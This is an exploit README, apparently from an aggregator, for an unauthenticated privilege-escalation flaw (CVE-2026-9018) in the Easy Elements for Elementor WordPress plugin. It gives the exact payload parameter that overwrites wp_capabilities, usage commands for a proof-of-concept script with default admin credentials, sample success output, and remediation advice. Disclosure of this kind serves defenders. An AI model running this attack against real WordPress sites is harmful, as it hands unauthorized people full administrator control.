## https://sploitus.com/exploit?id=BC1D8C43-7174-5774-8282-A8C6F19DE6FC
# CVE-2026-9018
# CVE-2026-9018 โ Easy Elements for Elementor โค 1.4.5 | Unauthenticated Privilege Escalation





> **Research by:** [Atomic Edge](https://atomicedge.io)
> **Severity:** High | **CVSS:** 8.8 | **Auth Required:** None
---
## Overview
An unauthenticated privilege escalation vulnerability exists in the **Easy Elements for Elementor โ Addons & Website Templates** WordPress plugin (versions โค 1.4.5). The `easyel_handle_register()` function, exposed via the `wp_ajax_nopriv_eel_register` AJAX handler, passes attacker-controlled `custom_meta` POST values directly to `update_user_meta()` without any key whitelist. This allows an unauthenticated attacker to overwrite the `wp_capabilities` meta key and create an **administrator-level account**.
| Property | Detail |
|-----------------|------------------------------------------------------------------------|
| **Plugin** | Easy Elements for Elementor โ Addons & Website Templates (easy-elements) |
| **Affected** | โค 1.4.5 |
| **Fixed In** | 1.4.6+ |
| **Vector** | Network / Unauthenticated |
| **CWE** | CWE-269: Improper Privilege Management |
| **AJAX Action** | `eel_register` (nopriv) |
---
## Prerequisites
Before exploitation, the following conditions must be met on the target site:
- โ WordPress **user registration is enabled** (`Settings โ General โ Anyone can register`)
- โ A page with the plugin's **Login/Register widget** is publicly accessible
- โ The widget exposes the `easy_elements_nonce` value in the page DOM
---
## Requirements
```bash
pip install requests
```
---
## Usage
```bash
# Basic โ nonce fetched from homepage
python3 poc.py -u https://target.com
# Custom credentials
python3 poc.py -u https://target.com -U hacker -e h@x.io -p P@ssw0rd!
# Widget is on /login/ page
python3 poc.py -u https://target.com --nonce-page /login/
# Skip SSL verification
python3 poc.py -u https://target.com --no-verify
# Skip post-exploit login check
python3 poc.py -u https://target.com --skip-verify-login
```
### Arguments
| Flag | Description | Default |
|------------------------|------------------------------------------------------|--------------------|
| `-u`, `--url` | Target WordPress URL | *(required)* |
| `-U`, `--username` | Username for the new admin account | `atomic_admin` |
| `-e`, `--email` | Email for the new admin account | `admin@atomicedge.io` |
| `-p`, `--password` | Password for the new admin account | `Atomic@Edge2026!` |
| `-np`, `--nonce-page` | Page path containing the Login/Register widget | `/` |
| `--no-verify` | Disable SSL certificate verification | `false` |
| `--skip-verify-login` | Skip post-exploit WP admin login verification | `false` |
### Example Output
```
[*] Fetching nonce from: https://target.com/login/
[+] Nonce found: a1b2c3d4e5
[*] Sending privilege escalation payload to: https://target.com/wp-admin/admin-ajax.php
[*] Username : atomic_admin
[*] Email : admin@atomicedge.io
[*] Role : administrator (via wp_capabilities override)
[+] HTTP Status : 200
[โ] Privilege escalation payload accepted!
[โ] Admin login CONFIRMED!
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ WP Admin : https://target.com/wp-admin/
โ Username : atomic_admin
โ Password : Atomic@Edge2026!
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
```
---
## Technical Details
The exploit follows a two-step process:
**Step 1 โ Nonce Harvesting**
The plugin's Login/Register Elementor widget renders a hidden `easy_elements_nonce` field in the page HTML. This nonce is publicly accessible to any unauthenticated visitor and is extracted via regex from the page source.
**Step 2 โ Malicious Registration**
A POST request is sent to `/wp-admin/admin-ajax.php` with `action=eel_register`. The `custom_meta` array is crafted to include:
```
custom_meta[wp_capabilities][administrator] = 1
```
Because `easyel_handle_register()` passes all `custom_meta` keys directly to `update_user_meta()` without a whitelist, the `wp_capabilities` user meta is overwritten post-registration, granting the new user full administrator privileges.
---
## Remediation
Developers must apply the following fixes to `easyel_handle_register()`:
1. **Implement a strict whitelist** of allowed `custom_meta` keys (e.g., `first_name`, `last_name`, `phone`)
2. **Explicitly block** sensitive keys: `wp_capabilities`, `wp_user_level`, `session_tokens`
3. **Avoid processing** any user-supplied meta after `wp_insert_user()` entirely if not required
4. Input sanitization alone is **insufficient** โ a whitelist is mandatory
**โ Update to Easy Elements for Elementor 1.4.6 or later immediately.**
---
## Disclaimer
> This repository is intended for **authorized security research and educational purposes only**.
> Do not use this tool against any system without **explicit written permission** from the system owner.
> Unauthorized use may violate the CFAA (USA), Criminal Code s.342.1 (Canada), EU NIS2 Directive, and other applicable laws.
> The authors accept **no liability** for misuse or damages arising from this code.